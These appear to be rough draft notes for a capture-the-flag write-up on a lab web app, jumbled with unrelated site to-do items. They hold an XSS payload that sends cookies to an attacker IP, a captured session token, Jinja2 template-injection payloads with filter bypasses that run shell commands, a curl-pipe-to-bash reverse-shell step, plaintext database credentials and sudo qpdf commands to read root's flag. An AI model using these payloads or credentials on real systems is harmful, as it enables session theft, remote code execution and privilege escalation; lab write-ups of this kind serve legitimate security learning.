Fix the height of the images in /posts when zooming in

Fix the text size when using phones

Fix the alignment of posts when zooming in in /posts


<img src=x onerror=fetch("http://10.10.14.147:8000/"+document.cookie);>

10.10.11.12 - - [18/May/2024 23:19:47] "GET /session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.Zkgk-g.MbTH2-kmGMEb5ikxNfM305U1wZU HTTP/1.1" 404 -


<div class="article-code">
{% highlight python %}
@app.route('/QRGenerator', methods=['GET', 'POST'])
def QRGenerator():
  ...
  if request.method == 'POST':
    form_type = request.form['form_type']
    ...
    elif form_type == 'scannable_invoice':
        qr_link = rdu(request.form['qr_link'])
        {% raw %}HTML = f"{{% extends 'temporary_invoice.html' %}}{{% block parameter1 %}}"
        HTML += '{}'.format(qr_link)
        HTML += '{% endblock %}'{% endraw %}
        rendered_template = render_template_string(HTML)
        
        return rendered_template
{% endhighlight %}
</div>



go over how the input works and how it renders images DONE

show how passing anything as input is displayed as the src attribute of the img element DONE

pass the malicious input DONE

{{request.application.__globals__.__builtins__.popen('ls').read()}} DONE

\x5f\x5f

{{ request.application.\x5f\x5fglobals\x5f\x5f.\x5f\x5fbuiltins\x5f\x5f.popen('ls').read() }}

show how it returns an error DONE

explain why it returns an error (go over rdu function)

give solution on how to bypass the function

open the ncat listener

pass the good malicious input

get the reverse shell



so this doesnt work

{{ request.application.\x5f\x5fglobals\x5f\x5f.\x5f\x5fbuiltins\x5f\x5f.popen('ls').read() }}

but this does

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")|attr("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("ls")|attr("read")()}}


{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}


{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls${IFS}-l')|attr('read')()%}{%print(a)%}{%endwith%}


{%with a=request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('curl http://10.10.14.147:8000/script.sh | bash')|attr('read')()%}{%print(a)%}{%endwith%}

db_config = {
    'host': '127.0.0.1',
    'user': 'iclean',
    'password': 'pxCsmnGLckUb',
    'database': 'capiclean'
}

mysql -h 127.0.0.1 -u iclean -p capiclean

sudo qpdf /root/root.txt /opt/app/root.txt

qpdf --empty --pages /root/root.txt -- output.pdf

qpdf--add-attachment

qpdf --add-attachment /root/root.txt -- - /home/flag

sudo qpdf --empty rootflag.txt --qdf --add-attachment /root/root.txt --
























